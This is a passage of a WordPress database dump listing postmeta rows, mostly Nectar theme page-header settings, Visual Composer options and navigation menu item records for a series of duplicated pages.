type'),(3362,6363,'_menu_item_menu_item_parent','6355'),(3363,6363,'_menu_item_object_id','6361'),(3364,6363,'_menu_item_object','page'),(3365,6363,'_menu_item_target',''),(3366,6363,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(3367,6363,'_menu_item_xfn',''),(3368,6363,'_menu_item_url',''),(3370,6364,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3371,6364,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3372,6364,'_wp_page_template','default'),(3373,6364,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(3374,6364,'nectar-metabox-portfolio-display-sortable','off'),(3375,6364,'_nectar_full_screen_rows','off'),(3376,6364,'_nectar_full_screen_rows_animation','none'),(3377,6364,'_nectar_full_screen_rows_animation_speed','medium'),(3378,6364,'_nectar_full_screen_rows_overall_bg_color',''),(3379,6364,'_nectar_full_screen_rows_anchors','off'),(3380,6364,'_nectar_full_screen_rows_mobile_disable','off'),(3381,6364,'_nectar_full_screen_rows_row_bg_animation','none'),(3382,6364,'_nectar_full_screen_rows_dot_navigation','tooltip'),(3383,6364,'_nectar_full_screen_rows_content_overflow','scrollbar'),(3384,6364,'_nectar_full_screen_rows_footer','none'),(3385,6364,'_nectar_slider_bg_type','image_bg'),(3386,6364,'_nectar_canvas_shapes',''),(3387,6364,'_nectar_media_upload_webm',''),(3388,6364,'_nectar_media_upload_mp4',''),(3389,6364,'_nectar_media_upload_ogv',''),(3390,6364,'_nectar_slider_preview_image',''),(3391,6364,'_nectar_header_bg',''),(3392,6364,'_nectar_header_parallax','off'),(3393,6364,'_nectar_header_box_roll','off'),(3394,6364,'_nectar_header_bg_height',''),(3395,6364,'_nectar_header_fullscreen','off'),(3396,6364,'_nectar_header_title',''),(3397,6364,'_nectar_header_subtitle',''),(3398,6364,'_nectar_page_header_text-effect','none'),(3399,6364,'_nectar_particle_rotation_timing',''),(3400,6364,'_nectar_particle_disable_explosion','off'),(3401,6364,'_nectar_page_header_alignment','left'),(3402,6364,'_nectar_page_header_alignment_v','middle'),(3403,6364,'_nectar_page_header_bg_alignment','center'),(3404,6364,'_nectar_header_bg_color',''),(3405,6364,'_nectar_header_font_color',''),(3406,6364,'_nectar_header_bg_overlay_color',''),(3407,6364,'_disable_transparent_header','off'),(3408,6364,'_force_transparent_header','off'),(3409,6364,'_wpb_vc_js_status','false'),(3410,6364,'_dp_original','6353'),(3411,6364,'_edit_lock','1514353180:1'),(3412,6364,'_edit_last','1'),(3413,6366,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3414,6366,'_menu_item_type','post_type'),(3415,6366,'_menu_item_menu_item_parent','6355'),(3416,6366,'_menu_item_object_id','6364'),(3417,6366,'_menu_item_object','page'),(3418,6366,'_menu_item_target',''),(3419,6366,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(3420,6366,'_menu_item_xfn',''),(3421,6366,'_menu_item_url',''),(3423,6367,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3424,6367,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3425,6367,'_wp_page_template','default'),(3426,6367,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(3427,6367,'nectar-metabox-portfolio-display-sortable','off'),(3428,6367,'_nectar_full_screen_rows','off'),(3429,6367,'_nectar_full_screen_rows_animation','none'),(3430,6367,'_nectar_full_screen_rows_animation_speed','medium'),(3431,6367,'_nectar_full_screen_rows_overall_bg_color',''),(3432,6367,'_nectar_full_screen_rows_anchors','off'),(3433,6367,'_nectar_full_screen_rows_mobile_disable','off'),(3434,6367,'_nectar_full_screen_rows_row_bg_animation','none'),(3435,6367,'_nectar_full_screen_rows_dot_navigation','tooltip'),(3436,6367,'_nectar_full_screen_rows_content_overflow','scrollbar'),(3437,6367,'_nectar_full_screen_rows_footer','none'),(3438,6367,'_nectar_slider_bg_type','image_bg'),(3439,6367,'_nectar_canvas_shapes',''),(3440,6367,'_nectar_media_upload_webm',''),(3441,6367,'_nectar_media_upload_mp4',''),(3442,6367,'_nectar_media_upload_ogv',''),(3443,6367,'_nectar_slider_preview_image',''),(3444,6367,'_nectar_header_bg',''),(3445,6367,'_nectar_header_parallax','off'),(3446,6367,'_nectar_header_box_roll','off'),(3447,6367,'_nectar_header_bg_height',''),(3448,6367,'_nectar_header_fullscreen','off'),(3449,6367,'_nectar_header_title',''),(3450,6367,'_nectar_header_subtitle',''),(3451,6367,'_nectar_page_header_text-effect','none'),(3452,6367,'_nectar_particle_rotation_timing',''),(3453,6367,'_nectar_particle_disable_explosion','off'),(3454,6367,'_nectar_page_header_alignment','left'),(3455,6367,'_nectar_page_header_alignment_v','middle'),(3456,6367,'_nectar_page_header_bg_alignment','center'),(3457,6367,'_nectar_header_bg_color',''),(3458,6367,'_nectar_header_font_color',''),(3459,6367,'_nectar_header_bg_overlay_color',''),(3460,6367,'_disable_transparent_header','off'),(3461,6367,'_force_transparent_header','off'),(3462,6367,'_wpb_vc_js_status','false'),(3463,6367,'_dp_original','6353'),(3464,6367,'_edit_lock','1514353251:1'),(3465,6367,'_edit_last','1'),(3466,6369,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3467,6369,'_menu_item_type','post_type'),(3468,6369,'_menu_item_menu_item_parent','6355'),(3469,6369,'_menu_item_object_id','6367'),(3470,6369,'_menu_item_object','page'),(3471,6369,'_menu_item_target',''),(3472,6369,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(3473,6369,'_menu_item_xfn',''),(3474,6369,'_menu_item_url',''),(3476,6370,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3477,6370,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3478,6370,'_wp_page_template','default'),(3479,6370,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(3480,6370,'nectar-metabox-portfolio-display-sortable','off'),(3481,6370,'_nectar_full_screen_rows','off'),(3482,6370,'_nectar_full_screen_rows_animation','none'),(3483,6370,'_nectar_full_screen_rows_animation_speed','medium'),(3484,6370,'_nectar_full_screen_rows_overall_bg_color',''),(3485,6370,'_nectar_full_screen_rows_anchors','off'),(3486,6370,'_nectar_full_screen_rows_mobile_disable','off'),(3487,6370,'_nectar_full_screen_rows_row_bg_animation','none'),(3488,6370,'_nectar_full_screen_rows_dot_navigation','tooltip'),(3489,6370,'_nectar_full_screen_rows_content_overflow','scrollbar'),(3490,6370,'_nectar_full_screen_rows_footer','none'),(3491,6370,'_nectar_slider_bg_type','image_bg'),(3492,6370,'_nectar_canvas_shapes',''),(3493,6370,'_nectar_media_upload_webm',''),(3494,6370,'_nectar_media_upload_mp4',''),(3495,6370,'_nectar_media_upload_ogv',''),(3496,6370,'_nectar_slider_preview_image',''),(3497,6370,'_nectar_header_bg',''),(3498,6370,'_nectar_header_parallax','off'),(3499,6370,'_nectar_header_box_roll','off'),(3500,6370,'_nectar_header_bg_height',''),(3501,6370,'_nectar_header_fullscreen','off'),(3502,6370,'_nectar_header_title',''),(3503,6370,'_nectar_header_subtitle',''),(3504,6370,'_nectar_page_header_text-effect','none'),(3505,6370,'_nectar_particle_rotation_timing',''),(3506,6370,'_nectar_particle_disable_explosion','off'),(3507,6370,'_nectar_page_header_alignment','left'),(3508,6370,'_nectar_page_header_alignment_v','middle'),(3509,6370,'_nectar_page_header_bg_alignment','center'),(3510,6370,'_nectar_header_bg_color',''),(3511,6370,'_nectar_header_font_color',''),(3512,6370,'_nectar_header_bg_overlay_color',''),(3513,6370,'_disable_transparent_header','off'),(3514,6370,'_force_transparent_header','off'),(3515,6370,'_wpb_vc_js_status','true'),(3516,6370,'_dp_original','6245'),(3517,6370,'_edit_lock','1515646805:1'),(3518,6370,'_edit_last','1'),(3519,6374,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3520,6374,'_menu_item_type','post_type'),(3521,6374,'_menu_item_menu_item_parent','6271'),(3522,6374,'_menu_item_object_id','6370'),(3523,6374,'_menu_item_object','page'),(3524,6374,'_menu_item_target',''),(3525,6374,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(3526,6374,'_menu_item_xfn',''),(3527,6374,'_menu_item_url',''),(3529,6375,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3530,6375,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3531,6375,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3532,6375,'_wp_page_template','default'),(3533,6375,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(3534,6375,'nectar-metabox-portfolio-display-sortable','off'),(3535,6375,'_nectar_full_screen_rows','off'),(3536,6375,'_nectar_full_screen_rows_animation','none'),(3537,6375,'_nectar_full_screen_rows_animation_speed','medium'),(3538,6375,'_nectar_full_screen_rows_overall_bg_color',''),(3539,6375,'_nectar_full_screen_rows_anchors','off'),(3540,6375,'_nectar_full_screen_rows_mobile_disable','off'),(3541,6375,'_nectar_full_screen_rows_row_bg_animation','none'),(3542,6375,'_nectar_full_screen_rows_dot_navigation','tooltip'),(3543,6375,'_nectar_full_screen_rows_content_overflow','scrollbar'),(3544,6375,'_nectar_full_screen_rows_footer','none'),(3545,6375,'_nectar_slider_bg_type','image_bg'),(3546,6375,'_nectar_canvas_shapes',''),(3547,6375,'_nectar_media_upload_webm',''),(3548,6375,'_nectar_media_upload_mp4',''),(3549,6375,'_nectar_media_upload_ogv',''),(3550,6375,'_nectar_slider_preview_image',''),(3551,6375,'_nectar_header_bg',''),(3552,6375,'_nectar_header_parallax','off'),(3553,6375,'_nectar_header_box_roll','off'),(3554,6375,'_nectar_header_bg_height',''),(3555,6375,'_nectar_header_fullscreen','off'),(3556,6375,'_nectar_header_title',''),(3557,6375,'_nectar_header_subtitle',''),(3558,6375,'_nectar_page_header_text-effect','none'),(3559,6375,'_nectar_particle_rotation_timing',''),(3560,6375,'_nectar_particle_disable_explosion','off'),(3561,6375,'_nectar_page_header_alignment','left'),(3562,6375,'_nectar_page_header_alignment_v','middle'),(3563,6375,'_nectar_page_header_bg_alignment','center'),(3564,6375,'_nectar_header_bg_color',''),(3565,6375,'_nectar_header_font_color',''),(3566,6375,'_nectar_header_bg_overlay_color',''),(3567,6375,'_disable_transparent_header','off'),(3568,6375,'_force_transparent_header','off'),(3569,6375,'_wpb_vc_js_status','false'),(3571,6375,'_dp_original','6269'),(3572,6375,'_edit_lock','1514382950:1'),(3573,6375,'_edit_last','1'),(3574,6377,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3575,6377,'_menu_item_type','post_type'),(3576,6377,'_menu_item_menu_item_parent','6271'),(3577,6377,'_menu_item_object_id','6375'),(3578,6377,'_menu_item_object','page'),(3579,6377,'_menu_item_target',''),(3580,6377,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(3581,6377,'_menu_item_xfn',''),(3582,6377,'_menu_item_url',''),(3584,6378,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3585,6378,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3586,6378,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3587,6378,'_wp_page_template','default'),(3588,6378,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(3589,6378,'nectar-metabox-portfolio-display-sortable','off'),(3590,6378,'_nectar_full_screen_rows','off'),(3591,6378,'_nectar_full_screen_rows_animation','none'),(3592,6378,'_nectar_full_screen_rows_animation_speed','medium'),(3593,6378,'_nectar_full_screen_rows_overall_bg_color',''),(3594,6378,'_nectar_full_screen_rows_anchors','off'),(3595,6378,'_nectar_full_screen_rows_mobile_disable','off'),(3596,6378,'_nectar_full_screen_rows_row_bg_animation','none'),(3597,6378,'_nectar_full_screen_rows_dot_navigation','tooltip'),(3598,6378,'_nectar_full_screen_rows_content_overflow','scrollbar'),(3599,6378,'_nectar_full_screen_rows_footer','none'),(3600,6378,'_nectar_slider_bg_type','image_bg'),(3601,6378,'_nectar_canvas_shapes',''),(3602,6378,'_nectar_media_upload_webm',''),(3603,6378,'_nectar_media_upload_mp4',''),(3604,6378,'_nectar_media_upload_ogv',''),(3605,6378,'_nectar_slider_preview_image',''),(3606,6378,'_nectar_header_bg',''),(3607,6378,'_nectar_header_parallax','off'),(3608,6378,'_nectar_header_box_roll','off'),(3609,6378,'_nectar_header_bg_height',''),(3610,6378,'_nectar_header_fullscreen','off'),(3611,6378,'_nectar_header_title',''),(3612,6378,'_nectar_header_subtitle',''),(3613,6378,'_nectar_page_header_text-effect','none'),(3614,6378,'_nectar_particle_rotation_timing',''),(3615,6378,'_nectar_particle_disable_explosion','off'),(3616,6378,'_nectar_page_header_alignment','left'),(3617,6378,'_nectar_page_header_alignment_v','middle'),(3618,6378,'_nectar_page_header_bg_alignment','center'),(3619,6378,'_nectar_header_bg_color',''),(3620,6378,'_nectar_header_font_color',''),(3621,6378,'_nectar_header_bg_overlay_color',''),(3622,6378,'_disable_transparent_header','off'),(3623,6378,'_force_transparent_header','off'),(3624,6378,'_wpb_vc_js_status','false'),(3626,6378,'_dp_original','6269'),(3627,6378,'_edit_lock','1514383122:1'),(3628,6378,'_edit_last','1'),(3629,6380,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3630,6380,'_menu_item_type','post_type'),(3631,6380,'_menu_item_menu_item_parent','6271'),(3632,6380,'_menu_item_object_id','6378'),(3633,6380,'_menu_item_object','page'),(3634,6380,'_menu_item_target',''),(3635,6380,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(3636,6380,'_menu_item_xfn',''),(3637,6380,'_menu_item_url',''),(3639,6381,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3640,6381,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3641,6381,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3642,6381,'_wp_page_template','default'),(3643,6381,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(3644,6381,'nectar-metabox-portfolio-display-sortable','off'),(3645,6381,'_nectar_full_screen_rows','off'),(3646,6381,'_nectar_full_screen_rows_animation','none'),(3647,6381,'_nectar_full_screen_rows_animation_speed','medium'),(3648,6381,'_nectar_full_screen_rows_overall_bg_color',''),(3649,6381,'_nectar_full_screen_rows_anchors','off'),(3650,6381,'_nectar_full_screen_rows_mobile_disable','off'),(3651,6381,'_nectar_full_screen_rows_row_bg_animation','none'),(3652,6381,'_nectar_full_screen_rows_dot_navigation','tooltip'),(3653,6381,'_nectar_full_screen_rows_content_overflow','scrollbar'),(3654,6381,'_nectar_full_screen_rows_footer','none'),(3655,6381,'_nectar_slider_bg_type','image_bg'),(3656,6381,'_nectar_canvas_shapes',''),(3657,6381,'_nectar_media_upload_webm',''),(3658,6381,'_nectar_media_upload_mp4',''),(3659,6381,'_nectar_media_upload_ogv',''),(3660,6381,'_nectar_slider_preview_image',''),(3661,6381,'_nectar_header_bg',''),(3662,6381,'_nectar_header_parallax','off'),(3663,6381,'_nectar_header_box_roll','off'),(3664,6381,'_nectar_header_bg_height',''),(3665,6381,'_nectar_header_fullscreen','off'),(3666,6381,'_nectar_header_title',''),(3667,6381,'_nectar_header_subtitle',''),(3668,6381,'_nectar_page_header_text-effect','none'),(3669,6381,'_nectar_particle_rotation_timing',''),(3670,6381,'_nectar_particle_disable_explosion','off'),(3671,6381,'_nectar_page_header_alignment','left'),(3672,6381,'_nectar_page_header_alignment_v','middle'),(3673,6381,'_nectar_page_header_bg_alignment','center'),(3674,6381,'_nectar_header_bg_color',''),(3675,6381,'_nectar_header_font_color',''),(3676,6381,'_nectar_header_bg_overlay_color',''),(3677,6381,'_disable_transparent_header','off'),(3678,6381,'_force_transparent_header','off'),(3679,6381,'_wpb_vc_js_status','false'),(3681,6381,'_dp_original','6269'),(3682,6381,'_edit_lock','1514383283:1'),(3683,6381,'_edit_last','1'),(3684,6383,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3685,6383,'_menu_item_type','post_type'),(3686,6383,'_menu_item_menu_item_parent','6271'),(3687,6383,'_menu_item_object_id','6381'),(3688,6383,'_menu_item_object','page'),(3689,6383,'_menu_item_target',''),(3690,6383,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(3691,6383,'_menu_item_xfn',''),(3692,6383,'_menu_item_url',''),(3694,6384,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3695,6384,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3696,6384,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3697,6384,'_wp_page_template','default'),(3698,6384,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(3699,6384,'nectar-metabox-portfolio-display-sortable','off'),(3700,6384,'_nectar_full_screen_rows','off'),(3701,6384,'_nectar_full_screen_rows_animation','none'),(3702,6384,'_nectar_full_screen_rows_animation_speed','medium'),(3703,6384,'_nectar_full_screen_rows_overall_bg_color',''),(3704,6384,'_nectar_full_screen_rows_anchors','off'),(3705,6384,'_nectar_full_screen_rows_mobile_disable','off'),(3706,6384,'_nectar_full_screen_rows_row_bg_animation','none'),(3707,6384,'_nectar_full_screen_rows_dot_navigation','tooltip'),(3708,6384,'_nectar_full_screen_rows_content_overflow','scrollbar'),(3709,6384,'_nectar_full_screen_rows_footer','none'),(3710,6384,'_nectar_slider_bg_type','image_bg'),(3711,6384,'_nectar_canvas_shapes',''),(3712,6384,'_nectar_media_upload_webm',''),(3713,6384,'_nectar_media_upload_mp4',''),(3714,6384,'_nectar_media_upload_ogv',''),(3715,6384,'_nectar_slider_preview_image',''),(3716,6384,'_nectar_header_bg',''),(3717,6384,'_nectar_header_parallax','off'),(3718,6384,'_nectar_header_box_roll','off'),(3719,6384,'_nectar_header_bg_height',''),(3720,6384,'_nectar_header_fullscreen','off'),(3721,6384,'_nectar_header_title',''),(3722,6384,'_nectar_header_subtitle',''),(3723,6384,'_nectar_page_header_text-effect','none'),(3724,6384,'_nectar_particle_rotation_timing',''),(3725,6384,'_nectar_particle_disable_explosion','off'),(3726,6384,'_nectar_page_header_alignment','left'),(3727,6384,'_nectar_page_header_alignment_v','middle'),(3728,6384,'_nectar_page_header_bg_alignment','center'),(3729,6384,'_nectar_header_bg_color',''),(3730,6384,'_nectar_header_font_color',''),(3731,6384,'_nectar_header_bg_overlay_color',''),(3732,6384,'_disable_transparent_header','off'),(3733,6384,'_force_transparent_header','off'),(3734,6384,'_wpb_vc_js_status','false'),(3736,6384,'_dp_original','6269'),(3737,6384,'_edit_lock','1514383378:1'),(3738,6384,'_edit_last','1'),(3739,6386,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3740,6386,'_menu_item_type','post_type'),(3741,6386,'_menu_item_menu_item_parent','6271'),(3742,6386,'_menu_item_object_id','6384'),(3743,6386,'_menu_item_object','page'),(3744,6386,'_menu_item_target',''),(3745,6386,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(3746,6386,'_menu_item_xfn',''),(3747,6386,'_menu_item_url',''),(3749,6387,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3750,6387,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3751,6387,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3752,6387,'_wp_page_template','default'),(3753,6387,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(3754,6387,'nectar-metabox-portfolio-display-sortable','off'),(3755,6387,'_nectar_full_screen_rows','off'),(3756,6387,'_nectar_full_screen_rows_animation','none'),(3757,6387,'_nectar_full_screen_rows_animation_speed','medium'),(3758,6387,'_nectar_full_screen_rows_overall_bg_color',''),(3759,6387,'_nectar_full_screen_rows_anchors','off'),(3760,6387,'_nectar_full_screen_rows_mobile_disable','off'),(3761,6387,'_nectar_full_screen_rows_row_bg_animation','none'),(3762,6387,'_nectar_full_screen_rows_dot_navigation','tooltip'),(3763,6387,'_nectar_full_screen_rows_content_overflow','scrollbar'),(3764,6387,'_nectar_full_screen_rows_footer','none'),(3765,6387,'_nectar_slider_bg_type','image_bg'),(3766,6387,'_nectar_canvas_shapes',''),(3767,6387,'_nectar_media_upload_webm',''),(3768,6387,'_nectar_media_upload_mp4',''),(3769,6387,'_nectar_media_upload_ogv',''),(3770,6387,'_nectar_slider_preview_image',''),(3771,6387,'_nectar_header_bg',''),(3772,6387,'_nectar_header_parallax','off'),(3773,6387,'_nectar_header_box_roll','off'),(3774,6387,'_nectar_header_bg_height',''),(3775,6387,'_nectar_header_fullscreen','off'),(3776,6387,'_nectar_header_title',''),(3777,6387,'_nectar_header_subtitle',''),(3778,6387,'_nectar_page_header_text-effect','none'),(3779,6387,'_nectar_particle_rotation_timing',''),(3780,6387,'_nectar_particle_disable_explosion','off'),(3781,6387,'_nectar_page_header_alignment','left'),(3782,6387,'_nectar_page_header_alignment_v','middle'),(3783,6387,'_nectar_page_header_bg_alignment','center'),(3784,6387,'_nectar_header_bg_color',''),(3785,6387,'_nectar_header_font_color',''),(3786,6387,'_nectar_header_bg_overlay_color',''),(3787,6387,'_disable_transparent_header','off'),(3788,6387,'_force_transparent_header','off'),(3789,6387,'_wpb_vc_js_status','false'),(3791,6387,'_dp_original','6269'),(3792,6387,'_edit_lock','1514383467:1'),(3793,6387,'_edit_last','1'),(3794,6389,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3795,6389,'_menu_item_type','post_type'),(3796,6389,'_menu_item_menu_item_parent','6271'),(3797,6389,'_menu_item_object_id','6387'),(3798,6389,'_menu_item_object','page'),(3799,6389,'_menu_item_target',''),(3800,6389,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(3801,6389,'_menu_item_xfn',''),(3802,6389,'_menu_item_url',''),(3804,6390,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3805,6390,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3806,6390,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3807,6390,'_wp_page_template','default'),(3808,6390,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(3809,6390,'nectar-metabox-portfolio-display-sortable','off'),(3810,6390,'_nectar_full_screen_rows','off'),(3811,6390,'_nectar_full_screen_rows_animation','none'),(3812,6390,'_nectar_full_screen_rows_animation_speed','medium'),(3813,6390,'_nectar_full_screen_rows_overall_bg_color',''),(3814,6390,'_nectar_full_screen_rows_anchors','off'),(3815,6390,'_nectar_full_screen_rows_mobile_disable','off'),(3816,6390,'_nectar_full_screen_rows_row_bg_animation','none'),(3817,6390,'_nectar_full_screen_rows_dot_navigation','tooltip'),(3818,6390,'_nectar_full_screen_rows_content_overflow','scrollbar'),(3819,6390,'_nectar_full_screen_rows_footer','none'),(3820,6390,'_nectar_slider_bg_type','image_bg'),(3821,6390,'_nectar_canvas_shapes',''),(3822,6390,'_nectar_media_upload_webm',''),(3823,6390,'_nectar_media_upload_mp4',''),(3824,6390,'_nectar_media_upload_ogv',''),(3825,6390,'_nectar_slider_preview_image',''),(3826,6390,'_nectar_header_bg',''),(3827,6390,'_nectar_header_parallax','off'),(3828,6390,'_nectar_header_box_roll','off'),(3829,6390,'_nectar_header_bg_height',''),(3830,6390,'_nectar_header_fullscreen','off'),(3831,6390,'_nectar_header_title',''),(3832,6390,'_nectar_header_subtitle',''),(3833,6390,'_nectar_page_header_text-effect','none'),(3834,6390,'_nectar_particle_rotation_timing',''),(3835,6390,'_nectar_particle_disable_explosion','off'),(3836,6390,'_nectar_page_header_alignment','left'),(3837,6390,'_nectar_page_header_alignment_v','middle'),(3838,6390,'_nectar_page_header_bg_alignment','center'),(3839,6390,'_nectar_header_bg_color',''),(3840,6390,'_nectar_header_font_color',''),(3841,6390,'_nectar_header_bg_overlay_color',''),(3842,6390,'_disable_transparent_header','off'),(3843,6390,'_force_transparent_header','off'),(3844,6390,'_wpb_vc_js_status','false'),(3846,6390,'_dp_original','6269'),(3847,6390,'_edit_lock','1514383537:1'),(3848,6390,'_edit_last','1'),(3849,6392,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3850,6392,'_menu_item_type','post_type'),(3851,6392,'_menu_item_menu_item_parent','6271'),(3852,6392,'_menu_item_object_id','6390'),(3853,6392,'_menu_item_object','page'),(3854,6392,'_menu_item_target',''),(3855,6392,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(3856,6392,'_menu_item_xfn',''),(3857,6392,'_menu_item_url',''),(3859,6393,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3860,6393,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3861,6393,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3862,6393,'_wp_page_template','default'),(3863,6393,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(3864,6393,'nectar-metabox-portfolio-display-sortable','off'),(3865,6393,'_nectar_full_screen_rows','off'),(3866,6393,'_nectar_full_screen_rows_animation','none'),(3867,6393,'_nectar_full_screen_rows_animation_speed','medium'),(3868,6393,'_nectar_full_screen_rows_overall_bg_color',''),(3869,6393,'_nectar_full_screen_rows_anchors','off'),(3870,6393,'_nectar_full_screen_rows_mobile_disable','off'),(3871,6393,'_nectar_full_screen_rows_row_bg_animation','none'),(3872,6393,'_nectar_full_screen_rows_dot_navigation','tooltip'),(3873,6393,'_nectar_full_screen_rows_content_overflow','scrollbar'),(3874,6393,'_nectar_full_screen_rows_footer','none'),(3875,6393,'_nectar_slider_bg_type','image_bg'),(3876,6393,'_nectar_canvas_shapes',''),(3877,6393,'_nectar_media_upload_webm',''),(3878,6393,'_nectar_media_upload_mp4',''),(3879,6393,'_nectar_media_upload_ogv',''),(3880,6393,'_nectar_slider_preview_image',''),(3881,6393,'_nectar_header_bg',''),(3882,6393,'_nectar_header_parallax','off'),(3883,6393,'_nectar_header_box_roll','off'),(3884,6393,'_nectar_header_bg_height',''),(3885,6393,'_nectar_header_fullscreen','off'),(3886,6393,'_nectar_header_title',''),(3887,6393,'_nectar_header_subtitle',''),(3888,6393,'_nectar_page_header_text-effect','none'),(3889,6393,'_nectar_particle_rotation_timing',''),(3890,6393,'_nectar_particle_disable_explosion','off'),(3891,6393,'_nectar_page_header_alignment','left'),(3892,6393,'_nectar_page_header_alignment_v','middle'),(3893,6393,'_nectar_page_header_bg_alignment','center'),(3894,6393,'_nectar_header_bg_color',''),(3895,6393,'_nectar_header_font_color',''),(3896,6393,'_nectar_header_bg_overlay_color',''),(3897,6393,'_disable_transparent_header','off'),(3898,6393,'_force_transparent_header','off'),(3899,6393,'_wpb_vc_js_status','false'),(3901,6393,'_dp_original','6269'),(3902,6393,'_edit_lock','1514383616:1'),(3903,6393,'_edit_last','1'),(3904,6395,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3905,6395,'_menu_item_type','post_type'),(3906,6395,'_menu_item_menu_item_parent','6271'),(3907,6395,'_menu_item_object_id','6393'),(3908,6395,'_menu_item_object','page'),(3909,6395,'_menu_item_target',''),(3910,6395,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(3911,6395,'_menu_item_xfn',''),(3912,6395,'_menu_item_url',''),(3914,6396,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3915,6396,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3916,6396,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3917,6396,'_wp_page_template','default'),(3918,6396,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(3919,6396,'nectar-metabox-portfolio-display-sortable','off'),(3920,6396,'_nectar_full_screen_rows','off'),(3921,6396,'_nectar_full_screen_rows_animation','none'),(3922,6396,'_nectar_full_screen_rows_animation_speed','medium'),(3923,6396,'_nectar_full_screen_rows_overall_bg_color',''),(3924,6396,'_nectar_full_screen_rows_anchors','off'),(3925,6396,'_nectar_full_screen_rows_mobile_disable','off'),(3926,6396,'_nectar_full_screen_rows_row_bg_animation','none'),(3927,6396,'_nectar_full_screen_rows_dot_navigation','tooltip'),(3928,6396,'_nectar_full_screen_rows_content_overflow','scrollbar'),(3929,6396,'_nectar_full_screen_rows_footer','none'),(3930,6396,'_nectar_slider_bg_type','image_bg'),(3931,6396,'_nectar_canvas_shapes',''),(3932,6396,'_nectar_media_upload_webm',''),(3933,6396,'_nectar_media_upload_mp4',''),(3934,6396,'_nectar_media_upload_ogv',''),(3935,6396,'_nectar_slider_preview_image',''),(3936,6396,'_nectar_header_bg',''),(3937,6396,'_nectar_header_parallax','off'),(3938,6396,'_nectar_header_box_roll','off'),(3939,6396,'_nectar_header_bg_height',''),(3940,6396,'_nectar_header_fullscreen','off'),(3941,6396,'_nectar_header_title',''),(3942,6396,'_nectar_header_subtitle',''),(3943,6396,'_nectar_page_header_text-effect','none'),(3944,6396,'_nectar_particle_rotation_timing',''),(3945,6396,'_nectar_particle_disable_explosion','off'),(3946,6396,'_nectar_page_header_alignment','left'),(3947,6396,'_nectar_page_header_alignment_v','middle'),(3948,6396,'_nectar_page_header_bg_alignment','center'),(3949,6396,'_nectar_hea